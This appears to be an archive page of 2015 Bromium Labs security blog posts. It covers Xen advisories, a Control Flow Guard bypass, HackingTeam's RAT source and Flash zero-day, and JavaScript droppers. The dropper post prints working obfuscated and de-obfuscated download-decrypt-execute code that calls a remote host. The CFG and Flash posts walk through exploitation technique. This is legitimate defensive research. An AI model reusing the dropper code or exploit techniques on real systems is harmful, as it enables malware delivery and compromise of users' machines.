November 3, 2015 / Rafal Wojtczuk

Xen security advisories from October 2015 and Bromium vSentry

Nine Xen hypervisor security advisories – XSA-145, XSA-146, XSA-147, XSA-148, XSA-149, XSA-150, XSA-151, XSA-152 and XSA-153 – were released on October 29. The good news is that none of them impacts the Bromium vSentry hypervisor. The most notable one is XSA-148:

XSA-148: x86: Uncontrolled creation of large page mappings by PV guests

This vulnerability allows a paravirtualized (PV) VM to access all memory on the system, including regions reserved for the hypervisor. This results in full compromise of the hypervisor. This is truly a critical vulnerability.
Bromium vSentry does not use PV VMs – instead, we use fully-virtualized (HVM) VMs. Therefore, this vulnerability does not impact vSentry.

The other XSAs are low-severity denial-of-service problems. They do not affect vSentry, because our codebase has been trimmed and hardened. Some details (provided by Christian Limpach):

XSA-149: leak of main per-domain vcpu pointer array

vSentry does not use a separate dynamic allocation for the relevant data structures, therefore it is not vulnerable

XSA-150: x86: Long latency populate-on-demand operation is not preemptible

vSentry does not implement the relevant functionality, therefore it is not vulnerable

XSA-151: x86: leak of per-domain profiling-related vcpu pointer array

vSentry does not implement the relevant functionality, therefore it is not vulnerable

XSA-152: x86: some pmu and profiling hypercalls log without rate limiting

vSentry does not implement the relevant functionality, therefore it is not vulnerable

XSA-153: x86: populate-on-demand balloon size inaccuracy can crash guests

vSentry does not implement the relevant functionality, therefore it is not vulnerable

The remaining XSA-145, XSA-146 and XSA-147 are ARM architecture specific, and therefore they do not impact vSentry.

September 28, 2015 / Rafal Wojtczuk

An interesting detail about Control Flow Guard

On Windows systems, before Windows 8.1 update 3, C code calling a function pointer used to be compiled to just a simple “call register” instruction; for example, in a 32bit process:

call esi

Starting with Windows 8.1 update 3, in all system libraries, it is more complicated:

mov ecx, esi
call ds:___guard_check_icall_fptr
call esi

This is how the Control Flow Guard (CFG) VC++ compiler feature works. Briefly, the ___guard_check_icall_fptr function checks whether the call target is a legal location – if it is not the beginning of a nonstatic function, it aborts execution. Therefore, an attacker who controls a function pointer cannot immediately reach arbitrary code (say, an “xchg eax, esp; ret” stack pivot gadget, which is almost always in the middle of a function). It significantly complicates the exploitation of vulnerabilities based on heap corruption. All libraries and executables shipped with recent Windows systems (in particular, Internet Explorer) benefit from this protection.
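To make the mechanism concrete, the check can be modeled as a membership test over valid function entry points (a toy Python model with made-up addresses – the real CFG check consults a compact bitmap of valid targets, not a set):

```python
# Toy model of the CFG check: only the entry points of nonstatic functions
# are valid indirect-call targets, so a pointer into the middle of a
# function (a gadget address) fails the check and aborts the process.
valid_targets = {0x401000, 0x401200, 0x401500}   # hypothetical entry points

def guard_check_icall(target):
    # Stand-in for ___guard_check_icall_fptr: abort on an illegal target.
    if target not in valid_targets:
        raise RuntimeError("__fastfail: invalid indirect call target")

def indirect_call(target):
    guard_check_icall(target)        # inserted by the compiler before "call reg"
    return "called %#x" % target

assert indirect_call(0x401200) == "called 0x401200"
try:
    indirect_call(0x401234)          # mid-function gadget address: rejected
    assert False
except RuntimeError:
    pass
```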

With some effort, it is possible to get around this protection, as described by CORE Security here and by Yuki Chen here. Basically, these two papers mention two methods:

  1. call a legal function that allows you to hijack control flow, e.g. NtContinue
  2. transit via code that is not compiled with CFG, e.g. the Flash JIT.

Now, after the above introduction, we are getting to the point of this post.

In some Windows 10 Technical Preview dlls, a function call is compiled into even more complicated assembly:

mov ebx, esp
mov ecx, edi
call ds:___guard_check_icall_fptr
call edi
cmp ebx, esp
jz short loc_6380DEF5
mov ecx, 4
int 29h
/* code after function call */

This code saves the stack pointer in ebx register, does the ___guard_check_icall_fptr
and the actual function call, and then checks that the stack pointer is unchanged (if it is changed, int 29h terminates the process). Why is this extra effort with esp checking needed?
Most likely, the answer is: to block another CFG bypass method. I have not seen any explanation explicitly related to VC++ CFG (in particular, this detail is not covered in the papers mentioned above), but a closely related technique can be found in the excellent “Out of Control” paper. In this paper, the authors were able to bypass another solution that imposed restrictions on control flow by reaching the following code (simplified for readability):

push controlled_arg1
call eax [*] ; eax controlled by an attacker

The value of eax at the moment of the call had been checked to be in a certain set of functions (so no call to the middle of the function is allowed). The problem was that the set of allowed functions included both stdcall functions (that remove the arguments from the stack in their epilogue) and cdecl functions (that do not remove arguments from the stack). In the above disassembly, it is apparent that the target is meant to be a stdcall function. If we point eax to a cdecl function, then after it returns, the stack is desynchronized – on its top, instead of the return address, there is the attacker-controlled argument. Therefore, the “ret” instruction will transfer execution to the location of attacker’s choice.
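The effect of the convention mismatch can be sketched with a toy stack model (illustrative Python with invented slot names, where index 0 of the list is the top of the stack):

```python
# The caller has just executed "push attacker_arg ; call eax" and, because
# it expects an stdcall target, performs no stack cleanup afterwards.
def run_callee(stack, convention, n_args):
    # The callee's ret consumes the return address...
    stack.pop(0)
    if convention == "stdcall":
        # ...and an stdcall callee's "ret imm16" also removes its arguments.
        del stack[:n_args]
    return stack

# Intended case: stdcall target, so the caller's frame stays consistent.
s = ["ret_into_caller", "attacker_arg", "caller_ret_addr"]
run_callee(s, "stdcall", 1)
assert s[0] == "caller_ret_addr"

# Attack: point eax at a cdecl function instead. The attacker-controlled
# argument is left on top of the stack, so the caller's eventual "ret"
# transfers execution to an attacker-chosen address.
s = ["ret_into_caller", "attacker_arg", "caller_ret_addr"]
run_callee(s, "cdecl", 1)
assert s[0] == "attacker_arg"
```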

On recent Windows 10 Technical Preview builds, the 32bit versions of ieframe.dll, jscript9.dll and mshtml.dll include this extra check for stack pointer sanity. However, other dlls do not have this check. Is there a suitable function in system libraries that we can transit through to achieve arbitrary EIP?
I spent quite some time looking for a real-life example (in particular, I wrote a scanner that tried each location in all dlls loaded by the 32bit IE renderer) but returned empty-handed. Admittedly, the requirements are strict – the function must not use a frame pointer, and it must call a controllable function.

I had more luck with a somewhat reversed approach – find a function that expects to call a cdecl function pointer, and feed it a stdcall function. The jackpot (on a recent Windows 10 Technical Preview build, in syswow64 libraries) is: kernel32!Windows::Globalization::Calendars::YearMonthCalendar::AddEras. Its pseudocode is:

jackpot() {
    indirect_call reg1;     // checked with CFG; we control reg1
    push controlled_value1  // argument to the function call below
    indirect_call reg2;     // checked with CFG; we control reg2
    function epilogue
}

Here, reg1 was meant to point to a cdecl function. The trick is to point reg1 to a stdcall function, which will remove a few words from the stack so that, after it returns, esp points to jackpot’s saved return address. The “push controlled_value1” instruction then overwrites jackpot’s saved return address. reg2 should point to a cdecl function. Then, when returning, jackpot transfers control to a location chosen by the attacker – for instance, a stack pivot gadget.
Therefore, this “stack desynchronization” technique is another generic (and real-life) method to bypass CFG, applicable to 32bit processes only. On the 64bit architecture, it is always the caller who removes the call arguments from the stack (note that the first four arguments are passed in registers, and any additional arguments are passed on the stack) – so there is no chance for the stack pointer to land in an unexpected location.
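For illustration, the whole jackpot sequence can be replayed on a toy stack model (Python, with invented slot names and counts – not the real frame layout of AddEras):

```python
# mem[] models stack slots (higher index = higher address); esp is an
# index into mem. jackpot's saved return address sits at index 3.
mem = ["local0", "local1", "local2", "jackpot_saved_ret", "caller_frame"]
esp = 0

# indirect_call reg1 -> the attacker picks an stdcall target whose
# "ret imm16" pops enough extra words to leave esp just past jackpot's
# saved return address (jackpot expected a cdecl target, i.e. no net change).
esp += 4

# push controlled_value1: esp moves down one slot and the write lands on
# jackpot's saved return address, clobbering it.
esp -= 1
mem[esp] = "controlled_value1"

# indirect_call reg2 -> a genuine cdecl target: call/ret balance out, and
# the pushed "argument" stays where it is, so esp is unchanged here.

# jackpot's epilogue: ret pops the overwritten slot straight into eip.
eip = mem[esp]
esp += 1
assert eip == "controlled_value1"
```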

July 10, 2015 / Nick Cano

Government Grade Malware: a Look at HackingTeam’s RAT


Security researchers the world over have been digging through the massive HackingTeam dump for the past five days, and what we’ve found has been surprising. I’ve heard this situation called many things, and there’s one description that I can definitely agree with: it’s like Christmas for hackers.

“On the fifth day of Christmas Bromium sent to me a malware analysis B-L-O-G” – You

This is a very interesting situation we’ve found ourselves in. We have our hands on the code repositories of HackingTeam, and inside of them we’ve found the source code for a cross-platform, highly-featured, government-grade RAT (Remote Access Trojan). It’s rare that we get to do analysis of complex malware at the source-code level, so I couldn’t wait to write a blog about it!

The first thing I noticed when I dove into the repositories was a bunch of projects for “RCS Agents”, and each of these agents seems to be a malware core for the HackingTeam RAT called Remote Control System, or RCS.


Each of the cores is made for a different OS and, together, they comprise a multi-platform malware that works on Windows, Windows Phone, Windows Mobile, Mac OSX, iOS, Linux, Android, BlackBerry OS, and Symbian. In this blog, I’ll cover the core-win32 repository, but you can assume that the functionality in the Windows agent is present on every other platform.


The code in this repository makes up a 32-bit DLL that is injected system-wide on Windows, enabling the malware to exist in the process space of many potential target applications. There’s also a core-win64 repository that contains the tools to compile this DLL for 64-bit systems.

When the DLL is injected into a process, it will unlink itself from the PEB (Process Environment Block) module list and start an IPC channel to communicate with other instances of the malware and, ultimately, to a root instance that is responsible for talking to the C&C server.

Core Functionality

RCS contains dozens of run-of-the-mill spying tools, similar to the ones found in tools like Blackshades and DarkComet. Here’s a look at the source code:


From a quick glance, we can see a number of ‘interesting’ tools:

  • HM_Pstorage.h and HM_PWDAgent (folder): grabs stored passwords from Firefox, Internet Explorer, Opera, Chrome, Thunderbird, Outlook, MSN Messenger, Paltalk, Gtalk, and Trillian.
  • HM_IMAgent.h and HM_IMAgent (folder): records conversations from Skype, Yahoo IM (versions 7 through 10), MSN Messenger (versions 2009 through 2011, now discontinued), and ICQ (version 7 only).
  • HM_SocialAgent.h and Social (folder): grabs session cookies for Gmail, Facebook, Yahoo Mail, Outlook (web client), and Twitter from Firefox, Chrome, and IE.
  • HM_MailCap.h, HM_Contacts.h, HM_MailAgent (folder) and HM_ContactAgent (folder): captures emails and contacts from Outlook and Windows Live Mail.
  • HM_AmbMic.h and HM_MicAgent (folder): records ambient noise picked up by any attached microphones.
  • wcam_grab.h and wcam_grab.cpp: periodically snap and save photos from attached webcam.
  • HM_Clipboard.h: grabs any data that is stored on the clipboard.
  • HM_KeyLog.h: logs all keystrokes.
  • HM_MouseLoh.h: logs all mouse movements and clicks.
  • HM_UrlLog.h: records visited URLs in Firefox, Chrome, IE, and Opera.

There’s nothing really novel in the code, and the methods mostly utilize standard API calls. This functionality is pretty common in most RATs, but we should consider that most of these files were checked into the repository as early as 2011, meaning RCS may have pioneered some of these features.

Some closer analysis of the code reveals that RCS does have some rarer features, though. In HM_SkypeRecord.h and HM_SkypeACL (folder), for instance, we can see that they use the DirectSound API to capture active Skype calls and save the audio using the Speex codec.


Additionally, we see that RCS can monitor printed documents (HM_PrintPool.h) and even grab private keys, balances, and transactions from Bitcoin, Litecoin, Feathercoin, and Namecoin wallets (HM_Money.h).


Luckily for us Shibe fans, they don’t seem to monitor Dogecoin wallets.


RCS uses the WLAN (wireless LAN) API functions from WLANAPI.DLL to enumerate nearby WiFi hotspots. Many hotspots expose geolocation information and RCS looks for this information so it can determine where the infected machine is, even when it is hiding behind a VPN or proxy.


Lateral Movement

Since HackingTeam seems to have a stockpile of 0days for lateral movement, you would think RCS wouldn’t employ any features with that specific purpose. You’d be wrong, though. They seem to have an infector that can infect USB drives, phones running Windows Mobile, and VMWare disks. This infector is located in HM_PDAAgent.h.

The USB infector is pretty standard. RCS polls for new USB drives, drops an installer on them, and infects the autorun.inf file to run that installer.


The Windows Mobile infector works in much the same way, copying the malware from the core-winmobile repository to the phone as a file called autorun.exe. Afterwards, it drops an infected autorun.zoo file on the phone. All of this is done using functions from RAPI.DLL, the standard Remote API for Windows Mobile devices.


The VMWare installer is a bit trickier. First, it will search for any VMWare disks (.vmdk) that aren’t in use. When it finds one, it will mount it to an open drive letter and then drop an RCS installer in either C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ (Windows 7 and above) or C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ (Windows XP). This code is a bit too bulky to post, but it starts on line 731 of HM_PDAAgent.h, in case you get your hands on the code and want to take a look.


RCS has a myriad of self-protection mechanisms, including AV detection, API call obfuscation, and API hook evasion. For starters, the AV detection is capable of detecting twenty-six different AV tools. Here’s a snippet from av_detect.h:


RCS detects these AVs either by looking for their drivers or checking the environment for certain variables. It’s smart enough to know which of its features will trigger alerts with which AVs, and will selectively disable features to remain hidden.


The malware also uses obfuscated API calls to prevent any form of static analysis from understanding what it is doing. In the file DynamiCall\obfuscated_calls.h, the malware has encoded strings that represent DLL names and API function names that it calls.


From there, DynamiCall\dynamic_import.h and DynamiCall\dynamic_import.cpp take care of decoding the strings, loading the DLLs, and resolving the addresses of the functions. Additionally, RCS has a set of API functions that it will only call if it can confirm that they aren’t being monitored: ReadProcessMemory, WriteProcessMemory, CreateRemoteThread, CreateThread, GetProcAddress, VirtualAllocEx, GetWindowText, SendMessageTimeout, and VirtualProtectEx. Every time one of these functions is called, RCS will grab the DLL that contains the function, manual-map it into memory, locate the target function in the manually-mapped library, and copy the first five bytes from the manually-mapped library over the first five bytes of the function in the actual library. If any step in this process fails, the malware will not call the function. The code that does this is pretty bulky, but you can find it in HM_SafeProcedures.h, HM_SafeProcedures.cpp, HM_PreamblePatch.h, and HM_PreamblePatch.cpp.
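The preamble-restoring idea can be sketched as follows (a minimal Python model, not HackingTeam’s actual code, which lives in HM_PreamblePatch.cpp; the byte values here are a classic hot-patchable prologue and a typical inline jmp hook):

```python
# Compare the first five bytes of the in-memory function against a clean
# copy obtained by manually mapping the DLL from disk; if they differ
# (e.g. a monitor planted an inline hook), copy the clean bytes back.
CLEAN_PREAMBLE = bytes([0x8B, 0xFF, 0x55, 0x8B, 0xEC])  # mov edi,edi; push ebp; mov ebp,esp

def restore_preamble(live, clean):
    """Return True if a hook was found (and overwritten with clean bytes)."""
    hooked = bytes(live[:5]) != clean[:5]
    if hooked:
        live[:5] = clean[:5]
    return hooked

# A monitoring tool has planted "jmp rel32" (0xE9 ...) at the entry point:
func = bytearray([0xE9, 0x10, 0x20, 0x30, 0x40, 0xC3])
assert restore_preamble(func, CLEAN_PREAMBLE)
assert func[:5] == CLEAN_PREAMBLE
```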

One of the most telling pieces of code in the malware, though, is an unfinished snippet starting on line 48 of format_resistant.cpp, which suggests the team was developing a way for RCS to persist through UEFI infection. Though the code is unfinished, it speaks to their future ambitions.

Note: Other repositories also contain some kernel-mode rootkits to hide the malware, but this blog is already getting pretty beefy.

Closing Thoughts

HackingTeam’s RCS is a fully-featured RAT with the ability to intercept large amounts of personal information, record conversations, access cameras, propagate to peripheral devices, and do it all without triggering any alarms. The source-code shows that the malware was developed by a very ambitious team, and the repository logs make it clear that it was under active development. The implications this carries are huge, especially considering HackingTeam’s customer list.

July 7, 2015 / Nick Cano

Adobe Flash Zero Day Vulnerability Exposed to Public

For those paying attention to infosec news, it’s no secret that HackingTeam – a provider of exploits and malware to governments around the world – has been hacked. The hackers who hacked the hackers released a torrent with over 400GB of internal HackingTeam software, tools, write-ups, and, of course, 0-day exploits. One of the exploits we’ve come across was first exposed by the Twitter user @w3bd3vil, and is reminiscent of the “ActionScript-Spray” attack used in CVE-2014-0322 and first documented by Bromium researcher Vadim Kotov. In summary, CVE-2014-0322 used a UAF (use after free) vulnerability in Microsoft’s Internet Explorer to increase the size of an ActionScript Vector object, giving the attacker access to the heap of the process. HackingTeam’s exploit uses this idea to achieve execution, but uses a UAF bug internal to the ActionScript 3 engine.

Note: before diving in, let’s remember that this is not a weaponized 0day, but a PoC that HackingTeam provided to customers, so we don’t have any malicious payload to accompany it; only a simple calc.exe pop.

The UAF vulnerability is quite simple. First, it sprays the heap with multiple ByteArray objects and surrounds each one with MyClass2 objects.


Spraying ByteArray and MyClass2 instances into memory

This loop iterates 30 times, effectively filling up the Array object a like so:

for i = 1 to 30:
    a.insert(MyClass2 instance)
    a.insert(ByteArray with length 0xfa0 [4000 bytes])
    a.insert(MyClass2 instance)

This spray strategically allocates a chunk of two sequential pages next to each ByteArray object, setting up ActionScript’s memory manager for exploitation. Before I dive into the code that does the exploitation, I want to give you a 10,000 foot view of how the exploit works. When a class instance is placed inside of a ByteArray, ActionScript will attempt to call the class’ member function .valueOf(), which is expected to return the actual byte to insert into the ByteArray; this is where the magic happens. ActionScript internally stores the location to the target ByteArray slot before calling .valueOf(), and it places the returned value at the stored location. In order to exploit this behavior, the attack resizes the target ByteArray from inside of .valueOf(). This causes a new chunk of memory to be allocated for the ByteArray object, freeing the old memory. Before returning, .valueOf() allocates a Vector that matches the size of the old ByteArray object. With a bit of luck (hence the 30 tries), the memory manager places the new Vector object on the freed memory from the old ByteArray. Then, when .valueOf() returns, ActionScript will write the return value directly to the length field of new Vector.
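The stale-pointer write can be modeled in a few lines (a toy Python model of the memory layout, not the actual AVM internals; offsets and values are illustrative except for the 0x3f0/0x40 pair, which come from the exploit):

```python
import struct

# The engine records the destination slot before valueOf() runs; valueOf()
# frees the ByteArray, a Vector is allocated over the same memory, and the
# byte returned by valueOf() then lands inside the Vector's length field.
chunk = bytearray(16)                    # freed ByteArray memory, reused by a Vector
struct.pack_into("<I", chunk, 0, 0x3f0)  # Vector length field, little-endian

stale_slot = 2            # recorded ByteArray write target, now mid-length-field
chunk[stale_slot] = 0x40  # the value returned by valueOf()

corrupted_length = struct.unpack_from("<I", chunk, 0)[0]
assert corrupted_length == 0x4003f0      # no longer 0x3f0: the write "succeeded"
```

This is exactly the condition the exploit tests for: any Vector whose length is no longer 0x3f0 was hit by the stale write.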

The attack iterates backwards over the sprayed ByteArray objects in a, and attempts to trigger the UAF on each one using this method. Here’s what the implementation looks like:


Attempting to trigger the vulnerability condition on the sprayed ByteArray objects

After .valueOf() returns and the ByteArray is updated, the attack loops over the list of Vector objects that it allocated (stored in _va) and checks their size. If any Vector has a size that is not 0x3f0, it means that the exploit succeeded in partially over-writing the size with the byte 0x40.


Checking the newly-allocated vector objects to see if one was affected by the exploit

From there, the attack uses the same method that was used to write the payload in CVE-2014-0322. The attack treats the affected Vector as a pointer to the entire memory space of the program (well, not the entire memory, but all memory following the Vector). It uses this to scan memory for the PE header of KERNEL32.DLL and grabs the address of VirtualProtect from the export table. Next, it overwrites the VFT (virtual function table) of an internal class with the address of VirtualProtect, and calls the function to set the memory of the MyClass2 instance directly after the affected Vector to PAGE_EXECUTE_READWRITE. With the MyClass2 memory set to executable, the attack finishes by finally placing its shellcode payload within the MyClass2 instance and using the same VFT trick to execute it.
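The memory scan for the KERNEL32.DLL image base boils down to a standard MZ/PE walk, sketched here in Python over a crafted buffer (a model of the technique, not the exploit’s ActionScript):

```python
import struct

# Walk a buffer looking for an "MZ" header whose e_lfanew field (at offset
# 0x3c) points at a valid "PE\0\0" signature -- the same check the exploit
# performs before reading the export table for VirtualProtect.
def find_pe_image(mem):
    off = mem.find(b"MZ")
    while off >= 0:
        if off + 0x40 <= len(mem):
            e_lfanew = struct.unpack_from("<I", mem, off + 0x3c)[0]
            sig = off + e_lfanew
            if mem[sig:sig + 4] == b"PE\x00\x00":
                return off
        off = mem.find(b"MZ", off + 1)
    return None

# Build a minimal fake image: MZ header at 0x100, PE signature 0x80 past it.
buf = bytearray(0x400)
buf[0x100:0x102] = b"MZ"
struct.pack_into("<I", buf, 0x100 + 0x3c, 0x80)
buf[0x180:0x184] = b"PE\x00\x00"
assert find_pe_image(bytes(buf)) == 0x100
```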

Out of the box, this exploit comes with shellcode for Windows (both 32 and 64 bit) and Mac OSX (64 bit only). According to the documentation present in the dump, this exploit should work with every version of Flash Player from version 9 onward. We’ve got it working internally with Flash Player 18 and Internet Explorer, which indicates it is clearly a zero-day risk to internet users today. Given legitimately sophisticated shellcode and mitigation bypass techniques similar to the ones documented by Bromium researcher Jared DeMott, this exploit has the potential to completely own almost any system that it hits, and it can be reliably blocked by leveraging robust isolation technologies.

UPDATE 7/8/2015: It seems like Adobe has already released a patch for this vulnerability, and Flash Player versions and above should be protected.

June 12, 2015 / Vadim Kotov

Oh look – JavaScript Droppers

In a typical drive-by-download attack scenario, the shellcode downloads and executes a malware binary. The malware binary is usually wrapped in a dropper that unpacks or de-obfuscates and executes it. A dropper’s main goal is to launch malware without being detected by antiviruses and HIPS. Nowadays the most popular way of covert launching is probably process hollowing. Recently we found a couple of curious specimens that do not follow this fashion. These cases are not new, but we thought they’re worth mentioning because we’ve been seeing quite a few of them lately. One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:

Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^<l.length;i++){v=h(m(2),l[i],k[0]);z=0;var s=g("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");f=a.GetTempName();s.Type=2;s.Charset="iso-8859-1";s.Open();d=v.charCodeAt(v.indexOf("PE\x00\x00")+23);x1=".\x65x\x65";s.WriteText(v);if(31^<d){z=1;f+=".dll"}else f+=x1;s.SaveToFile(f,2);z^&^&(f="regsvr32"+x1+" /s "+f);s.Close();"cmd"+x1+" /c "+f,0);w1.Sleep(u*2)}}}catch(q){}df();function r(k,e){for(var l=0,n,c=[],q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&255,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&255,l=l+c[b]^&255,n=c[b],c[b]=c[l],c[l]=n,q.push(String.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&255]));return q.join("")}function su(k,e){k.setRequestHeader("User-Agent",e)}function h(k,y,j){var e=g("WinHttp.WinHttpRequest.5.1");e.SetProxy(0);e.Open("\x47E\x54",y,0);su(e,k);e.Send();if(200==e.status)return r(e.responseText,j)}function df(){a.deleteFile(w1.ScriptFullName)}function g(k){return new ActiveXObject(k)};>wtm.js && start wscript //B wtm.js "y0fz0r5qF2MT" "hxxp://" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

It’s actually a one liner that creates a JavaScript file and launches it using wscript. The de-obfuscated JavaScript code looks like this:

var w = new ActiveXObject("WScript.Shell"),
    a = new ActiveXObject("Scripting.FileSystemObject");

try {
    rc4_key = WScript.Arguments(0);
    URL = WScript.Arguments(1);
    user_agent_string = WScript.Arguments(2);

    separator = "***";

    WScript.Sleep(600 * 600); // ~6 minutes, in milliseconds

    var n = request_and_decrypt(user_agent_string, URL, rc4_key);

    if (n.indexOf(separator) > 3) {
        k = n.split(separator);
        l = k[1].split(";");

        for (var i = 0; i < l.length; i++) {
            v = request_and_decrypt(user_agent_string, l[i], k[0]);
            is_dll = 0;
            var s = new ActiveXObject("ADODB.Stream");
            filename = a.GetTempName();
            s.Type = 2;
            s.Charset = "iso-8859-1";
            s.Open();

            pe_characteristics = v.charCodeAt(v.indexOf("PE\x00\x00") + 23);

            if (31 < pe_characteristics) {
                is_dll = 1;
                filename += ".dll";
            } else {
                filename += ".exe";
            }

            s.WriteText(v);
            s.SaveToFile(filename, 2);
            s.Close();

            if (is_dll)
                filename = "regsvr32.exe /s " + filename;

            w.Run("cmd.exe /c " + filename, 0);
            WScript.Sleep(600 * 2);
        }
    }
} catch (q) {}
delete_self();

function RC4_decrypt(k, e) {
    for (var l = 0, n, c = [], q = [], b = 0; 256 > b; b++) c[b] = b;

    for (b = 0; 256 > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) & 255, n = c[b], c[b] = c[l], c[l] = n;

    for (var p = l = b = 0; p < k.length; p++) b = b + 1 & 255, l = l + c[b] & 255, n = c[b], c[b] = c[l], c[l] = n, q.push(String.fromCharCode(k.charCodeAt(p) ^ c[c[b] + c[l] & 255]));

    return q.join("");
}

function request_and_decrypt(user_agent_string, URL, rc4_key) {
    var request = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    request.SetProxy(0);
    request.Open("GET", URL, 0);
    request.setRequestHeader("User-Agent", user_agent_string);
    request.Send();

    if (200 == request.status)
        return RC4_decrypt(request.responseText, rc4_key);
}

function delete_self() {
    a.deleteFile(WScript.ScriptFullName);
}

After a 6-minute sleep, the script downloads an RC4-encrypted text file containing the URLs of malware binaries. It decrypts the list and, for each entry, downloads, decrypts and executes the corresponding binary. The same RC4 key is used for all the downloads. Before launching a binary, the script checks the PE header to determine whether it’s an EXE or a DLL. In the former case it will issue:

cmd.exe /c .exe

in the latter:

regsvr32.exe /s .dll

After that the script will delete itself. We could assume certain benefits of this approach:

  1. It might trick some HIPS or proactive AV modules
  2. The binaries are encrypted – therefore the chances of network detection are slim
  3. The URLs of the malicious binaries are not hardcoded – they are easily configurable
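For reference, the dropper’s two core routines – the RC4 transform in r() and the EXE-vs-DLL test on the PE header – can be mirrored in Python (a sketch, not the original code; the key string is the one passed on the script’s command line above):

```python
def rc4(data, key):
    # Mirrors the dropper's r(k, e): RC4 key scheduling followed by the PRGA.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) & 255
        S[i], S[j] = S[j], S[i]
    out, i, j = [], 0, 0
    for ch in data:
        i = (i + 1) & 255
        j = (j + S[i]) & 255
        S[i], S[j] = S[j], S[i]
        out.append(chr(ord(ch) ^ S[(S[i] + S[j]) & 255]))
    return "".join(out)

def is_dll(image):
    # The byte at offset("PE\0\0") + 23 is the high byte of the COFF
    # Characteristics field; IMAGE_FILE_DLL (0x2000) sets its 0x20 bit,
    # hence the script's "31 < d" test.
    off = image.index(b"PE\x00\x00")
    return image[off + 23] > 31

# RC4 is symmetric, so applying it twice with the same key round-trips:
assert rc4(rc4("payload", "y0fz0r5qF2MT"), "y0fz0r5qF2MT") == "payload"

# Characteristics 0x2102 (DLL) vs 0x0102 (EXE), little-endian at PE+22:
assert is_dll(b"PE\x00\x00" + b"\x00" * 18 + b"\x02\x21")
assert not is_dll(b"PE\x00\x00" + b"\x00" * 18 + b"\x02\x01")
```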

Interestingly, we saw a similar dropper in an EXE as well. A fake Flash Player installer from hxxp:// is an EXE that shows clean on VirusTotal (permalink). It creates a JavaScript file and a batch script. Here’s the de-obfuscated JavaScript:

(function(c) {
    function a(a, b) {
        if (!b || !a) return null;
        b = e["ExpandEnvironmentStrings"](b);
        var d = WScript.CreateObject("Msxml2.XMLhttp");
        d.open("GET", a, !1);
        d.send();
        var c = new ActiveXObject("ADODB.Stream");
        with (c) return Mode = 3, Type = 1, Open(), Write(d["responseBody"]), SaveToFile(b, 2), Close(), b;
    }

    fso = new ActiveXObject("Scripting.FileSystemObject");
    var e = new ActiveXObject("WScript.Shell");
    c = new ActiveXObject("Shell.Application");
    FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");

    a("", "%APPDATA%\\7winzip.exe");
    a("", "%APPDATA%\\wilndfiles");
    a("", "%APPDATA%\\wilndfile.cmd");
    a("", "%APPDATA%\\wilndfiler.cmd");

    c.ShellExecute("cmd.exe", '/c"' + FileDestr + 'wilndfile.cmd"', "", "runas", 0);
    c.ShellExecute("cmd.exe", '/c"' + FileDestr + 'wilndfiler.cmd"', "", "runas", 0);
})();


It downloads four files; notice that these are HTTPS connections, again rendering traffic filters useless. The files are:

  1. 7winzip.exe – an instance of 7-Zip
  2. wilndfiles – a password-protected 7z archive
  3. wilndfile.cmd – a batch script
  4. wilndfiler.cmd – a batch script

After that it executes both scripts: the first one unpacks the archive and launches the malware, and the second cleans up all the dropper-related files. Is this method more beneficial than more traditional droppers? It appears so. Instead of making more sophisticated PE droppers, it seems rational to just switch to JavaScript and use the PE as a “dropper” for JavaScript. Given 0 positives on VirusTotal, it seems antiviruses do not scrutinize such scripts too well. Of course, VirusTotal doesn’t do justice to the antiviruses: some of them have HIPS modules and various heuristics that could possibly detect it. But still, none of them had a signature for this dropper, not even a generic one, and that should be alarming.

May 13, 2015 / Jared DeMott

The Floppies Won’t Eat Your Mouse

We heard tell of a mean ol’ venom on the street (CVE-2015-3456).  “Hey, give that back to Spidey.”


So we decided to have a look.  But we’re not talking about superheroes.  We’re talking about floppy.  Remember this fella?


He seems bummed out.  That’s because there’s not much need for him anymore.  Or so we thought.  Let’s give it over to the expert:


“Thank you Captain.  Indeed certain hypervisors may still include code, which enables the use of this primitive alien technology, known as the “floppy”.  As expected, federation level technologies (Bromium) removed such useless code to begin with.  (E.g. vSentry is not at all vulnerable.)

The source code file that holds the vulnerability is fdc.c.  Here is the detailed code flaw and fix:

Though it has not been observed, it appears that rogues with system level privileges in a VM could escape to host, if the vulnerable code were compiled in.  Estimating impact is non-trivial as always.  Most of the risk is in the cloud, and details about the exact compiled version of their hypervisor are unlikely to surface.  Either way, providers will react to this threat quickly.  Thus, real world impact is not expected at this time.”

Now back to our regularly scheduled program.

P.S. This bug was found by Jason Geffner – Great job!

April 1, 2015 / Nick Cano

The ABC’s of APT

Here at Bromium Labs, we’re always striving to further our knowledge of the rapidly-changing attack landscape that threatens our enterprise customers. Over the past few months, our dedicated team of researchers have collectively developed a severe chemical dependency on caffeine in search of a paradigm to clearly define this landscape in a way that could benefit the security community as a whole. What they came up with is truly groundbreaking, and will go down in history as “The ABC’s of APT.”

ABC's of APT

Image CopyWronged© By Bromium Labs

As we all know, the term APT refers to an “Advanced Persistent Threat.” In our research, we realized each APT has unique behavior, and casting them all under one umbrella can be a slippery slope towards people marrying their television sets. For this reason, we devised our own paradigm that strips the broad term “APT” from threat diagnoses and, instead, categorizes them using a more specialized spectrum. Surprisingly, this spectrum happens to encompass twenty-six distinct behaviors – each of which can be represented using one letter of the alphabet. And, thus, The ABC’s of APT were born. Without further blabbering, here’s our finished diagnosis table:

Read more…

March 12, 2015 / Vadim Kotov

